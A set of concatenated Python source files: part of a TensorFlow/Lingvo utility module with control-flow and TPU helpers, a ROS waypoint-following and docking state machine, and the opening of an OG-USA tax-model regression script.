return self._data.stateful_ops
@property
def captured_inputs(self):
"""Implicit input tensors captured by `fwd`."""
return self._data.captured_inputs
def CallDefun(fwd, args=None, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
args: A Nested Structure of tf.Tensor or None.
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for fwd. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for bak.
device: the device on which to run fwd and bak.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
if args is not None:
args = Transform(tf.convert_to_tensor, args)
sigs = Function(
fwd_sig=TensorSpecs(args),
bak=bak,
bak_as_function=bak_as_function,
device=device)(
fwd=fwd)
if args is None:
return sigs()
else:
return sigs(args)
def If(cond, inputs, then_branch, else_branch):
"""Helper to construct an if/else statement.
Args:
cond: A scalar `Tensor` that can be converted to boolean.
inputs: A flattenable representing the input tensors of the if/else
statement. Can be None to represent no inputs.
then_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'else_branch' returns.
else_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'then_branch' returns.
Returns:
Output returned by the call to either 'then_branch' or 'else_branch'.
"""
fwd_sig = TensorSpecs(inputs)
then_sigs = Function(fwd_sig=fwd_sig)(fwd=then_branch)
else_sigs = Function(fwd_sig=fwd_sig)(fwd=else_branch)
assert IsCompatible(then_sigs.output_dtypes, else_sigs.output_dtypes), (
'Outputs of then_branch and else_branch are not compatible: {} vs {}'
.format(then_sigs.output_dtypes, else_sigs.output_dtypes))
if then_sigs.captured_inputs != else_sigs.captured_inputs:
raise ValueError('Differing captured inputs in then and else. '
'Ensure the same tensors are captured in the same order.')
ret = tf.If(
cond=cond,
inputs=Flatten(then_sigs.AddFrameworkInputs(inputs)) +
then_sigs.captured_inputs,
then_branch=then_sigs.func,
else_branch=else_sigs.func)
return Pack(then_sigs.output_dtypes, ret)
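# A minimal usage sketch (illustrative values):
#   y = If(cond=tf.constant(True),
#          inputs=NestedMap(x=tf.constant(2)),
#          then_branch=lambda nmap: nmap.x * 2,
#          else_branch=lambda nmap: nmap.x - 1)
#   # y is 4 when cond is True, 1 otherwise.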
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
fwd_sig = TensorSpecs(loop_state)
cond_sigs = Function(fwd_sig=fwd_sig)(fwd=cond)
def BodyWrapped(loop_state):
result = body(loop_state)
# loop_state is augmented with global tensors inside of DefinedFunction.
# WhileLoop needs to return the same structure as the inputs, so we augment
# the return value here to match.
result = cond_sigs.AddFrameworkInputs(result)
return result
body_sigs = Function(fwd_sig=fwd_sig)(fwd=BodyWrapped)
wrapped_inputs = body_sigs.AddFrameworkInputs(loop_state)
new_state = tf.While(
Flatten(wrapped_inputs), cond=cond_sigs.func, body=body_sigs.func)
# The functional `While` used above does not have a registered gradient.
# This was not a problem in Graph mode, however in Eager mode,
# GradientTape will attempt to call the gradient of the While op in the
# forward pass. `stop_gradient` is used to pretend the op is a constant
# in the forward pass. This also avoids calling the gradient of other ops in
# `While` in the forward pass.
# Details in https://www.tensorflow.org/api_docs/python/tf/custom_gradient.
# Guarded by 'IsEagerMode' to limit impact.
if IsEagerMode():
new_state = [tf.stop_gradient(t) for t in new_state]
return Pack(wrapped_inputs, new_state).inputs
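# A minimal usage sketch (illustrative values): doubles a counter until it
# reaches at least 100.
#   final = WhileLoop(
#       cond=lambda s: s.value < 100,
#       body=lambda s: NestedMap(value=s.value * 2),
#       loop_state=NestedMap(value=tf.constant(3)))
#   # final.value is 192 (3 -> 6 -> 12 -> 24 -> 48 -> 96 -> 192).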
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
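# Illustrative usage sketch (not part of the original source): accumulate a
# running sum over a fixed iteration count.
#
#   def _Body(i, s):
#     s.total += tf.cast(i, tf.float32)
#     return s
#
#   final = ForLoop(_Body, start=0, limit=10, delta=1,
#                   loop_state=NestedMap(total=tf.constant(0.0)))
#   # final.total == 45.0 (the sum 0 + 1 + ... + 9)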
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
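# Illustrative sketch (not part of the original source): TopK mirrors the
# (values, indices) return order of tf.math.top_k for k <= 2.
#
#   x = tf.constant([[0.1, 0.7, 0.3, 0.5]])
#   values, indices = TopK(x, k=2)
#   # values  ~= [[0.7, 0.5]]
#   # indices ==  [[1, 3]]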
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: the `Operation` object for a VarHandleOp.
Raises:
TypeError: if var_op is not a VarHandleOp.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type != 'VarHandleOp':
raise TypeError('var_op should be a VarHandleOp, got %s' % str(var_op.type))
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')
_get_tpu_summary_tensors = _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY,
lambda: [])
def AddTpuSummaryTensor(name, value, weight=1.0):
"""Adds tensor to global collection of summaries.
Use this in situations where tf.summary() would normally be used but is not
currently supported. Call py_utils.AddTpuSummaryTensor() in low-level code to
add summary tensors to the global collection of summaries, then recover them
by calling py_utils.GetTpuSummaryTensors() from top-level code (for example
from the ComputeLoss method of BaseTask).
In addition to the 'name' argument, the current TensorFlow name scope is also
captured and added to the metric name. This way, for example, summaries from
a repeated layer appear as separate graphs in TensorBoard.
The weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss
for the exact definition of weight for eval metrics.
Args:
name: metric name
value: metric value tensor
weight: weight tensor for weighted metrics
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
x = NestedMap()
x.name = name
x.value = value, tf.convert_to_tensor(weight)
x.name_scope = tf.get_default_graph().get_name_scope()
tpu_summary_tensors.append(x)
def GetTpuSummaryTensors():
"""Returns summary tensors from global collection.
Returns:
A dict containing str keys and (metric, weight) pairs as values
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
return {
'%s/%s' % (x.name, SanitizeScopeKey(x.name_scope)): x.value
for x in tpu_summary_tensors
}
def ClearTpuSummaryTensors():
tpu_summary_tensors = _get_tpu_summary_tensors()
del tpu_summary_tensors[:]
def ComputationShape(split_size, topology=None):
"""Decides the computation shape based on the split_size.
Args:
split_size: number of accelerators to use per split.
topology: a serialized string of `tensorflow.tpu.TopologyProto`, or a
`tf.tpu.experimental.Topology` object, that describes the TPU cluster
topology. If not set, it'll use a default setting based on split_size.
Returns:
A 4-element list that describes the computation shape.
"""
if topology:
if isinstance(topology, tf.tpu.experimental.Topology):
topology_info = topology
else:
topology_info = tf_topology.Topology(serialized=topology)
computation_shape = None
if topology and functools.reduce(lambda a, b: a * b,
topology_info.mesh_shape) == split_size:
computation_shape = topology_info.mesh_shape
elif split_size == 1:
computation_shape = [1, 1, 1, 1]
elif topology and topology_info.mesh_shape[
-1] == 1 and split_size in topology_info.mesh_shape:
# For Megacore, if we find exact match on mesh shape, map split_size to it
computation_shape = [1, 1, 1, 1]
computation_shape[topology_info.mesh_shape.tolist().index(
split_size)] = split_size
else:
if topology:
cores_per_chip = topology_info.mesh_shape[-1]
else:
cores_per_chip = 2
assert split_size % cores_per_chip == 0
split_chips = split_size // cores_per_chip
if split_chips == 1:
computation_shape = [1, 1, 1, cores_per_chip]
elif split_chips == 2:
computation_shape = [1, 2, 1, cores_per_chip]
elif split_chips == 4:
computation_shape = [2, 2, 1, cores_per_chip]
elif split_chips == 8:
computation_shape = [4, 2, 1, cores_per_chip]
elif split_chips == 16:
computation_shape = [4, 4, 1, cores_per_chip]
elif split_chips == 32:
if topology and topology_info.mesh_shape[1] == 32:
# Fwd within-replica all-reduces are performed along the column;
# Bwd gradient cross-replica all-reduces are performed along the row.
# This currently has better performance than the strided pattern.
computation_shape = [1, 32, 1, cores_per_chip]
else:
computation_shape = [4, 8, 1, cores_per_chip]
elif split_chips == 64:
computation_shape = [8, 8, 1, cores_per_chip]
elif split_chips == 128:
computation_shape = [8, 16, 1, cores_per_chip]
elif split_chips == 256:
computation_shape = [16, 16, 1, cores_per_chip]
elif split_chips == 512:
computation_shape = [16, 32, 1, cores_per_chip]
elif split_chips == 1024:
computation_shape = [32, 32, 1, cores_per_chip]
elif split_chips == 2048:
computation_shape = [64, 32, 1, cores_per_chip]
elif split_chips == 4096:
computation_shape = [128, 32, 1, cores_per_chip]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
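# Illustrative sketch (not part of the original source): with no topology given,
# cores_per_chip defaults to 2, so the split is laid out over split_size // 2 chips.
#
#   ComputationShape(1)   # -> [1, 1, 1, 1]
#   ComputationShape(8)   # -> [2, 2, 1, 2]  (4 chips in a 2x2x1 slice, 2 cores each)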
def GetExtraVars():
"""Returns the captured variables by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.variable_captures
return function.get_extra_vars()
def GetExtraInputs():
"""Returns the captured input tensors by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.external_captures
return function.get_extra_inputs()
def GetExtraArgs():
"""Returns the corresponding function arguments for the captured inputs."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.internal_captures
return function.get_extra_args()
def ShardedFilePatternToGlob(file_pattern):
"""Converts a file pattern path@shards to path-?????-of-shards."""
if ',' in file_pattern:
raise ValueError(
'ShardedFilePatternToGlob does not support multiple file patterns.')
if '@' not in file_pattern:
return file_pattern
path, shards = file_pattern.split('@')
if shards == '*':
return f'{path}-?????-of-*'
return f'{path}-?????-of-{int(shards):05}'
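# Illustrative sketch (not part of the original source): path@shards becomes a
# zero-padded glob, and a '*' shard count stays a wildcard.
#
#   ShardedFilePatternToGlob('/data/train.tfrecord@8')
#   # -> '/data/train.tfrecord-?????-of-00008'
#   ShardedFilePatternToGlob('/data/train.tfrecord@*')
#   # -> '/data/train.tfrecord-?????-of-*'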
def ComputeNceAndAuc(probs, targets, mask):
"""Compute normalized cross entropy and AUC of the PR curve for a batch.
Args:
probs: a tensor of shape [batch, time].
targets: a tensor of shape [batch, time], where each element is either 0 or
1 indicating wrong or correct.
mask: a tensor of shape [batch, time], a mask for hyp sequence.
Returns:
nce: a tensor of shape [1], the normalized cross entropy value.
auc: a tensor of shape [1], the AUC value.
"""
def LogWithClip(tensor, clip_value_min=1e-8):
"""Clip all elements of a tensor to a minimum before taking log."""
return tf.math.log(tf.clip_by_value(tensor, clip_value_min, 1.0))
bce = -targets * LogWithClip(probs) - (1 - targets) * LogWithClip(1 - probs)
num_cor = tf.reduce_sum(targets * mask)
num_tokens = tf.reduce_sum(mask)
wcr = num_cor / num_tokens
entropy = -wcr * LogWithClip(wcr) - (1 - wcr) * LogWithClip(1 - wcr)
avg_conditional_entropy = tf.reduce_mean(tf.boolean_mask(bce, mask))
nce = (entropy - avg_conditional_entropy) / entropy
auc = tf.metrics.auc(targets, probs, mask, curve='PR')[1]
return nce, auc
def GatherTensorValuesBySeqIndices(tensor, class_indices, keepdims=False):
"""Gather values from a 3d tensor according to sequences of indices.
Args:
tensor: a 3d tensor of [dim0, dim1, num_class], e.g. output from softmax.
class_indices: a 2d tensor of [dim0, dim1], where the second dim is a
sequence of class indices between 0 to num_class - 1, inclusive.
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
A tensor ret of [dim0, dim1], where
ret[b, t] = tensor[b, t, indices[b, t]].
If keepdims is True, then ret has shape [dim0, dim1, 1].
"""
tensor = HasRank(tensor, 3)
class_indices = HasRank(class_indices, 2)
tensor = HasShape(tensor, GetShape(class_indices), 2)
dim0 = GetShape(class_indices)[0]
dim1 = GetShape(class_indices)[1]
dim0_indices = tf.tile(tf.expand_dims(tf.range(dim0), axis=-1), [1, dim1])
dim1_indices = tf.tile(tf.expand_dims(tf.range(dim1), axis=0), [dim0, 1])
gather_indices = tf.stack([
tf.cast(dim0_indices, dtype=class_indices.dtype),
tf.cast(dim1_indices, dtype=class_indices.dtype), class_indices
],
axis=-1)
ret = tf.gather_nd(tensor, gather_indices)
if keepdims:
ret = tf.expand_dims(ret, axis=-1)
return ret
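# Illustrative sketch (not part of the original source): gathering per-step
# values from a [batch, time, num_class] tensor. Values are placeholders.
#
#   probs = tf.constant([[[0.1, 0.9], [0.8, 0.2]]])   # shape [1, 2, 2]
#   ids = tf.constant([[1, 0]])                       # shape [1, 2]
#   GatherTensorValuesBySeqIndices(probs, ids)        # -> [[0.9, 0.8]]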
def GetSoftmaxProbsBySeqIndices(logits, indices, keepdims=False):
"""Get softmax probabilities from index sequences given logits sequences.
Args:
logits: a tensor of [batch, time, num_class] or [time, batch, num_class].
indices: a tensor of [batch, time] or [time, batch].
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
a tensor of [batch, time] or [time, batch] for the corresponding softmax
probabilities. If keepdims is True, returned tensor has a third dimension
of size 1.
"""
probs = tf.nn.softmax(logits)
return GatherTensorValuesBySeqIndices(probs, indices, keepdims)
def DivideNoNan(x, y):
"""Equivalent to tf.math.divide_no_nan but supports bfloat16."""
safe_y = tf.where(tf.equal(y, 0.), tf.ones_like(y), y)
return tf.where(tf.equal(y, 0.0), tf.zeros_like(x), x / safe_y)
def SequencePaddings(seqlen, maxlen=None):
mask = tf.sequence_mask(seqlen, maxlen, dtype=tf.float32)
return 1 - mask
def AppendDims(x, ndims):
return tf.reshape(x, GetShape(x) + [1] * ndims)
def MaybeSoftCapLogits(x, cap=0.0):
"""Caps logits x to be within a certain range.
Args:
x: A float tensor, the logit values to be capped.
cap: a float, the limit to cap x within. If cap <= 0.0, x is not capped.
Returns:
logits after capping.
"""
if cap <= 0.0:
return x
else:
return cap * tf.math.tanh(x / cap)
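# Illustrative sketch (not part of the original source): with cap=10.0 the output
# is squashed into (-10, 10); with cap <= 0.0 the input passes through unchanged.
#
#   MaybeSoftCapLogits(tf.constant([-100.0, 0.0, 100.0]), cap=10.0)
#   # -> approximately [-10.0, 0.0, 10.0]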
def GetTpuEmbeddingGraphCollection():
"""Return the graph collection that stores the TpuEmbeddingCollection."""
tpu_emb_graph_collection = tf.get_collection_ref('__tpu_embedding_collection')
assert len(tpu_emb_graph_collection) <= 1
return tpu_emb_graph_collection
class AuxLossContext:
"""Context that holds a list of aux-losses.
By default it is non-reentrant, but can be specified as reentrant explicitly
when creating an inner context.
"""
_global_stack = []
@classmethod
def Current(cls):
"""Returns current context or None."""
if cls._global_stack:
return cls._global_stack[-1]
else:
return None
def __init__(self, reentrant=False):
self.aux_loss_tensors = []
self._reentrant = reentrant
def AddLoss(self, loss):
self.aux_loss_tensors.append(loss)
@property
def aux_losses(self):
return self.aux_loss_tensors
def __enter__(self):
if not self._reentrant:
assert not self._global_stack, 'no re-entry'
self._global_stack.append(self)
return self
def __exit__(self, *args):
self._global_stack.pop()
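# Illustrative usage sketch (not part of the original source): outer code opens
# the context, nested layers append losses via AuxLossContext.Current(), and the
# caller sums them afterwards. `some_aux_loss` is a placeholder tensor.
#
#   with AuxLossContext() as ctx:
#     # ... inside a nested layer:
#     #   aux_ctx = AuxLossContext.Current()
#     #   if aux_ctx is not None:
#     #     aux_ctx.AddLoss(some_aux_loss)
#     total_aux = tf.add_n(ctx.aux_losses) if ctx.aux_losses else tf.constant(0.0)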
def GetTrainableVariables(scope, bprop_variable_filter,
bprop_variable_exclusion, vmap):
"""Returns trainable vars.
Args:
scope: A Python str.
bprop_variable_filter: see BaseTask.Params().bprop_variable_filter.
bprop_variable_exclusion: see BaseTask.Params().bprop_variable_exclusion.
vmap: A NestedMap of var_path(str) -> tf Variable.
Returns:
A filtered NestedMap of var_path(str) -> trainable tf Variable.
"""
pos = re.compile(bprop_variable_filter) if bprop_variable_filter else None
neg = re.compile(
bprop_variable_exclusion) if bprop_variable_exclusion else None
def VariableFilter(v):
"""Returns True if variable v should be optimized by this learner."""
if not v.trainable:
return False
if pos and not pos.search(v.name):
tf.logging.info('%s: disabled by bprop_variable_filter: %s', scope,
v.name)
return False
if neg and neg.search(v.name):
tf.logging.info('%s: disabled by bprop_variable_exclusion: %s', scope,
v.name)
return False
return True
return vmap.Filter(VariableFilter)
|
follow_waypoints.py
|
#!/usr/bin/env python
import threading
import rospy
import actionlib
from smach import State,StateMachine
from april_docking.msg import DockingAction, DockingGoal
#from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
#from mbf_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped, PoseArray
from actionlib_msgs.msg import GoalStatus
from std_msgs.msg import Empty
from tf import TransformListener
import tf
import math
import rospkg
import csv
import time
#Path for saving and retrieving the pose.csv file
output_file_path = rospkg.RosPack().get_path('follow_waypoints')+"/saved_path/pose.csv"
waypoints = []
class FollowPath(State):
def __init__(self):
State.__init__(self, outcomes=['success','failure'], input_keys=['waypoints'])
self.frame_id = rospy.get_param('~goal_frame_id','map')
self.odom_frame_id = rospy.get_param('~odom_frame_id','odom')
self.base_frame_id = rospy.get_param('~base_frame_id','base_footprint')
self.duration = rospy.get_param('~wait_duration', 0.0)
self.move_base_type = rospy.get_param('~move_base_type','move_base')
self.move_base_ns = rospy.get_param('~move_base_ns','move_base')
# Get a move_base action client
if self.move_base_type == 'move_base':
from move_base_msgs.msg import MoveBaseAction
elif self.move_base_type == 'move_base_flex':
from mbf_msgs.msg import MoveBaseAction
self.client = actionlib.SimpleActionClient(self.move_base_ns, MoveBaseAction)
self.client_dock = actionlib.SimpleActionClient('docking', DockingAction)
rospy.loginfo('Connecting to move_base...')
self.client.wait_for_server()
rospy.loginfo('Connected to move_base.')
rospy.loginfo('Starting a tf listener.')
self.tf = TransformListener()
self.listener = tf.TransformListener()
self.distance_tolerance = rospy.get_param('~waypoint_distance_tolerance', 0.0)
rospy.loginfo(self.frame_id + ',' + str(self.duration) + ',' + str(self.distance_tolerance))
def execute(self, userdata):
global waypoints
# Execute waypoints each in sequence
for wp_type, waypoint in waypoints:
# Break if preempted
if waypoints == []:
rospy.loginfo('The waypoint queue has been reset.')
break
# Otherwise publish next waypoint as goal
if wp_type == "pose":
if self.move_base_type == 'move_base':
from move_base_msgs.msg import MoveBaseGoal
elif self.move_base_type == 'move_base_flex':
from mbf_msgs.msg import MoveBaseGoal
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = self.frame_id
goal.target_pose.pose.position = waypoint.pose.pose.position
goal.target_pose.pose.orientation = waypoint.pose.pose.orientation
rospy.loginfo('Executing move_base goal to position (x,y): %s, %s' %
(waypoint.pose.pose.position.x, waypoint.pose.pose.position.y))
rospy.loginfo("To cancel the goal: 'rostopic pub -1 /move_base/cancel actionlib_msgs/GoalID -- {}'")
self.client.send_goal(goal)
if not self.distance_tolerance > 0.0:
while not self.client.wait_for_result(rospy.Duration(30.0)):
self.client.send_goal(goal)
result = self.client.get_state()
if result == GoalStatus.SUCCEEDED:
rospy.loginfo("Waiting for %f sec..." % self.duration)
time.sleep(self.duration)
else:
rospy.loginfo("Failed to reach the waypoint")
return 'failure'
else:
#This is the loop which exits once the robot is within distance_tolerance of the goal point.
distance = float("inf")
while(distance > self.distance_tolerance):
if self.client.wait_for_result(rospy.Duration(0.1)):
result = self.client.get_state()
if result == GoalStatus.SUCCEEDED:
now = rospy.Time.now()
self.listener.waitForTransform(self.frame_id, self.base_frame_id, now, rospy.Duration(4.0))
trans,rot = self.listener.lookupTransform(self.frame_id,self.base_frame_id, now)
distance = math.sqrt(pow(waypoint.pose.pose.position.x-trans[0],2)+pow(waypoint.pose.pose.position.y-trans[1],2))
if distance > self.distance_tolerance:
rospy.loginfo("Goal reported as reached but outside the distance tolerance. Resending waypoint...")
self.client.send_goal(goal)
else:
rospy.loginfo("Reached the waypoint")
break
else:
rospy.loginfo("Failed to reach the waypoint")
return 'failure'
else:
now = rospy.Time.now()
self.listener.waitForTransform(self.frame_id, self.base_frame_id, now, rospy.Duration(4.0))
trans,rot = self.listener.lookupTransform(self.frame_id,self.base_frame_id, now)
distance = math.sqrt(pow(waypoint.pose.pose.position.x-trans[0],2)+pow(waypoint.pose.pose.position.y-trans[1],2))
elif wp_type == "dock":
goal = DockingGoal()
goal.goalId = waypoint
self.client_dock.send_goal(goal)
self.client_dock.wait_for_result()
result = self.client_dock.get_state()
if result == GoalStatus.SUCCEEDED:
rospy.loginfo("Wait for %f seconds..." % 4.0)
time.sleep(4.0)
else:
rospy.loginfo("Failed to dock")
return 'failure'
return 'success'
def convert_PoseWithCovArray_to_PoseArray(waypoints):
"""Used to publish waypoints as pose array so that you can see them in rviz, etc."""
poses = PoseArray()
poses.header.frame_id = rospy.get_param('~goal_frame_id','map')
poses.poses = [pose.pose.pose for wp_type, pose in waypoints if wp_type == "pose"]
return poses
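# Expected layout of saved_path/pose.csv, inferred from the reader/writer below
# (values are placeholders): a 7-field row is a pose (x, y, z, qx, qy, qz, qw)
# and a single-field row is a docking goal id.
#
#   1.0,2.0,0.0,0.0,0.0,0.0,1.0
#   dock_1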
class GetPath(State):
def __init__(self):
State.__init__(self, outcomes=['success'], input_keys=['waypoints'], output_keys=['waypoints'])
# Create publisher to publish waypoints as pose array so that you can see them in rviz, etc.
self.poseArray_publisher = rospy.Publisher('/waypoints', PoseArray, queue_size=1)
# Start thread to listen for reset messages to clear the waypoint queue
def wait_for_path_reset():
"""thread worker function"""
global waypoints
while not rospy.is_shutdown():
data = rospy.wait_for_message('/path_reset', Empty)
rospy.loginfo('Received path RESET message')
self.initialize_path_queue()
rospy.sleep(3) # Wait 3 seconds because `rostopic echo` latches
# for three seconds and wait_for_message() in a
# loop will see it again.
reset_thread = threading.Thread(target=wait_for_path_reset)
reset_thread.start()
def initialize_path_queue(self):
global waypoints
waypoints = [] # the waypoint queue
# publish empty waypoint queue as pose array so that you can see the change in rviz, etc.
self.poseArray_publisher.publish(convert_PoseWithCovArray_to_PoseArray(waypoints))
def execute(self, userdata):
global waypoints
self.initialize_path_queue()
self.path_ready = False
# Start thread to listen for when the path is ready (this function will end then)
# Also will save the clicked path to pose.csv file
def wait_for_path_ready():
"""thread worker function"""
data = rospy.wait_for_message('/path_ready', Empty)
rospy.loginfo('Received path READY message')
self.path_ready = True
with open(output_file_path, 'w') as file:
for wp_type, current_pose in waypoints:
if wp_type == "pose":
file.write(str(current_pose.pose.pose.position.x) + ',' + str(current_pose.pose.pose.position.y) + ',' + str(current_pose.pose.pose.position.z) + ',' + str(current_pose.pose.pose.orientation.x) + ',' + str(current_pose.pose.pose.orientation.y) + ',' + str(current_pose.pose.pose.orientation.z) + ',' + str(current_pose.pose.pose.orientation.w)+ '\n')
rospy.loginfo('poses written to '+ output_file_path)
ready_thread = threading.Thread(target=wait_for_path_ready)
ready_thread.start()
self.start_journey_bool = False
# Start thread to listen for start_journey messages,
# which load the saved poses from follow_waypoints/saved_path/pose.csv
def wait_for_start_journey():
"""thread worker function"""
data_from_start_journey = rospy.wait_for_message('start_journey', Empty)
rospy.loginfo('Received start_journey message')
global waypoints
waypoints = []
with open(output_file_path, 'r') as file:
reader = csv.reader(file, delimiter = ',')
for row in reader:
print(row)
if len(row) == 7:
current_pose = PoseWithCovarianceStamped()
current_pose.pose.pose.position.x = float(row[0])
current_pose.pose.pose.position.y = float(row[1])
current_pose.pose.pose.position.z = float(row[2])
current_pose.pose.pose.orientation.x = float(row[3])
current_pose.pose.pose.orientation.y = float(row[4])
current_pose.pose.pose.orientation.z = float(row[5])
current_pose.pose.pose.orientation.w = float(row[6])
waypoints.append(("pose", current_pose))
elif len(row) == 1:
waypoints.append(("dock", row[0]))
self.poseArray_publisher.publish(convert_PoseWithCovArray_to_PoseArray(waypoints))
self.start_journey_bool = True
start_journey_thread = threading.Thread(target=wait_for_start_journey)
start_journey_thread.start()
topic = "/initialpose"
rospy.loginfo("Waiting to receive waypoints via Pose msg on topic %s" % topic)
rospy.loginfo("To start following waypoints: 'rostopic pub /path_ready std_msgs/Empty -1'")
rospy.loginfo("OR")
rospy.loginfo("To start following saved waypoints: 'rostopic pub /start_journey std_msgs/Empty -1'")
# Wait for published waypoints or saved path loaded
while (not self.path_ready and not self.start_journey_bool):
try:
pose = rospy.wait_for_message(topic, PoseWithCovarianceStamped, timeout=1)
except rospy.ROSException as e:
if 'timeout exceeded' in str(e):
continue # no new waypoint within timeout, looping...
else:
raise e
rospy.loginfo("Received new waypoint")
waypoints.append(("pose", pose))
# publish waypoint queue as pose array so that you can see them in rviz, etc.
self.poseArray_publisher.publish(convert_PoseWithCovArray_to_PoseArray(waypoints))
# Path is ready! return success and move on to the next state (FOLLOW_PATH)
return 'success'
class PathComplete(State):
def __init__(self):
State.__init__(self, outcomes=['success'])
def execute(self, userdata):
rospy.loginfo('###############################')
rospy.loginfo('##### REACHED FINISH GATE #####')
rospy.loginfo('###############################')
return 'success'
def main():
rospy.init_node('follow_waypoints')
sm = StateMachine(outcomes=['success'])
with sm:
StateMachine.add('GET_PATH', GetPath(),
transitions={'success':'FOLLOW_PATH'},
remapping={'waypoints':'waypoints'})
StateMachine.add('FOLLOW_PATH', FollowPath(),
transitions={'success':'PATH_COMPLETE', 'failure':'PATH_COMPLETE'},
remapping={'waypoints':'waypoints'})
StateMachine.add('PATH_COMPLETE', PathComplete(),
transitions={'success':'GET_PATH'})
outcome = sm.execute()
|
run_reforms.py
|
#!/usr/bin/env python
'''
'''
from __future__ import print_function
try:
import traceback
from multiprocessing import Process
import argparse
import json
import os
from pprint import pformat
import sys
import time
import uuid
sys.path.append("../")
import matplotlib
matplotlib.use('Agg')
import pandas as pd
import ogusa
from ogusa import SS
from ogusa import TPI
from ogusa.scripts import postprocess
from ogusa.scripts.execute import runner # change here for small jobs
from ogusa.utils import REFORM_DIR, BASELINE_DIR
except Exception as e:
pref = sys.prefix
exc = traceback.format_exc()
raise ValueError("Failed on sys.prefix {} on imports with {} - {}".format(pref, repr(e), exc))
#from execute_small import runner
VERSION = "0.5.5"
QUICK_RUN = False
REFORM_SPEC_HELP = '''Over time, code renaming and API changes have
required what was "reforms.json" to change
formats in order to keep producing the same
results in regression testing. new_reforms.json was
added on Oct 10, 2016 for this reason and is
now the default reform-spec'''
_d = os.path.dirname
REGRESSION_CONFIG_FILE = os.path.join(_d(_d(os.path.abspath(__file__))), '.regression.txt')
REGRESSION_CONFIG = {}
for line in open(REGRESSION_CONFIG_FILE).readlines():
line = line.strip()
parts = tuple(p.strip() for p in line.split())
if len(parts) == 2:
k, v = parts
if k in ('diff', 'dry_run_imports_installs_only'):
v = v.lower() == 'true'
REGRESSION_CONFIG[k] = v
REQUIRED = set(('compare_taxcalc_version',
'compare_ogusa_version',
'install_taxcalc_version',
'diff',
'numpy_version',
'reform_specs_json'))
missing = [r for r in REQUIRED if r not in REGRESSION_CONFIG]
if missing:
raise ValueError('.regression.txt at top level of repo needs to define: {}'.format(missing))
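# Example .regression.txt (illustrative sketch; version numbers and values below
# are placeholders, not from the original repo). Each line is "key value"; the
# 'diff' and 'dry_run_imports_installs_only' values are parsed as booleans.
#
#   compare_taxcalc_version 0.13.0
#   compare_ogusa_version 0.5.5
#   install_taxcalc_version 0.13.0
#   diff True
#   numpy_version 1.13.3
#   reform_specs_json new_reforms.json
#   dry_run_imports_installs_only False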
def run_micro_macro(reform, user_params, guid, solution_checks, run_micro):
# Turn off checks for now
SS.ENFORCE_SOLUTION_CHECKS = solution_checks
TPI.ENFORCE_SOLUTION_CHECKS = solution_checks
start_time = time.time()
reform_dir = "./OUTPUT_REFORM" + guid
baseline_dir = "./OUTPUT_BASELINE" + guid
